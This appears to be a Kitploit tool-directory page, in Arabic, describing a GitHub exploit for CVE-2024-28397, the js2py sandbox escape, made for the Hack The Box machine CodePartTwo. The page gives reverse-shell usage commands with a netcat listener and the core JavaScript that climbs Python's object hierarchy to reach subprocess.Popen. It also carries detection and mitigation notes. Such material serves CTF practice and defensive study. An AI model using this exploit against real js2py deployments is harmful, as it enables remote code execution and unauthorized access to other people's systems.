Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28397 — يحتوي هذا المستودع على كود استغلال بلغة بايثون لثغرة CVE-2024-28397، مخصص للاستخدام على جهاز "CodePartTwo" في منصة Hack The Box (HTB). | Kitploit
أدوات/GitHubGitHub/naclapor/cve-2024-28397
تحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubnaclapor/cve-2024-28397

CVE-2024-28397

يحتوي هذا المستودع على كود استغلال بلغة بايثون لثغرة CVE-2024-28397، مخصص للاستخدام على جهاز "CodePartTwo" في منصة Hack The Box (HTB).

عرض المستودع
1216منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-28397 استغلال الهروب من بيئة العزل في js2py - (CodePartTwo - HTB)

كود استغلال بلغة Python لـ CVE-2024-28397، وهي ثغرة حرجة في js2py <= 0.74 تسمح بالهروب من بيئة العزل وتنفيذ الأكواد عن بُعد.

🚨 تفاصيل الثغرة

  • معرّف CVE: CVE-2024-28397
  • البرمجيات المتأثرة: js2py <= 0.74
  • الخطورة: حرجة (CVSS 9.8)
  • النوع: هروب من بيئة العزل / تنفيذ أكواد عن بُعد
  • تاريخ الاكتشاف: فبراير 2024

الوصف

js2py هي مكتبة Python شهيرة لتقييم أكواد JavaScript داخل بيئات Python. تسمح هذه الثغرة للمهاجمين بالهروب من بيئة العزل الخاصة بـ js2py وتنفيذ أوامر Python/أوامر النظام بشكل تعسفي، حتى عند تفعيل js2py.disable_pyimport().

يستغل هذا الكود قدرات الاستبطان الكائني في Python عبر JavaScript للوصول إلى كلاس subprocess.Popen وتنفيذ أوامر النظام.

🎯 التطبيقات المتأثرة

  • تطبيقات الويب التي تستخدم js2py لتقييم JavaScript
  • منصات تنفيذ الأكواد (مثل محررات الأكواد عبر الإنترنت)
  • أدوات تجريف الويب التي تحلل JavaScript
  • أي تطبيق يعالج JavaScript غير موثوق عبر js2py

🚀 الاستخدام

المتطلبات الأساسية

pip install requests

الاستخدام الأساسي

# Start netcat listener
nc -lnvp 4444

# Run exploit
python3 exploit.py --target http://target.com:8000/run_code --lhost 10.10.14.100 --lport 4444

خيارات سطر الأوامر

--target    Target URL endpoint (required)
--lhost     Local IP for reverse shell (required)
--lport     Local port for reverse shell (default: 4444)

مثال

python3 exploit.py --target http://10.10.11.82:8000/run_code --lhost 10.10.14.100

🔧 كيف يعمل

  1. توليد الحمولة: ينشئ أمر reverse shell مشفّرًا بـ base64
  2. الهروب من بيئة العزل: يستخدم JavaScript للوصول إلى التسلسل الهرمي للكائنات في Python عبر __class__ و __base__
  3. تنفيذ العملية: يحدد subprocess.Popen من خلال الاستبطان
  4. تنفيذ الأوامر: ينفذ أمر reverse shell باستخدام Popen
  5. إنشاء الاتصال: يعود للاتصال بجهاز المهاجم

التفاصيل التقنية

يعمل الاستغلال من خلال:

  • الوصول إلى Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
  • التنقل في التسلسل الهرمي لكائنات Python باستخدام __subclasses__()
  • العثور على كلاس subprocess.Popen
  • إنشاء عملية جديدة لتنفيذ الـ reverse shell

📝 بنية كود الاستغلال

// Access Python object hierarchy
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a, "__class__"), "__base__");

// Find subprocess.Popen class
function findpopen(o) {
    // Recursive search through subclasses
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
    }
}

// Execute command
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();

🛡️ الاكتشاف

ابحث عن أكواد JavaScript تحتوي على:

  • الوصول إلى الخاصية __class__ أو ___class___
  • استدعاءات دالة __subclasses__()
  • إشارات إلى subprocess أو Popen
  • حمولات مشفّرة base64 مع printf و base64 -d

🔒 التخفيف

  1. تحديث js2py: قم بالترقية إلى إصدار مصحح (> 0.74)
  2. التحقق من الإدخال: عقم أكواد JavaScript قبل التنفيذ
  3. العزل: استخدم حاويات إضافية (Docker, chroot)
  4. مراجعة الكود: راجع سياقات تنفيذ JavaScript
  5. قواعد WAF: احظر أنماط JavaScript المشبوهة

⚠️ إخلاء مسؤولية قانوني

هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. يتحمل المستخدمون مسؤولية الامتثال للقوانين واللوائح المعمول بها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

📚 المراجع

  • تقرير CVE الأصلي
  • مستودع js2py على GitHub
  • تفاصيل CVE-2024-28397

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

تنزيل الأداة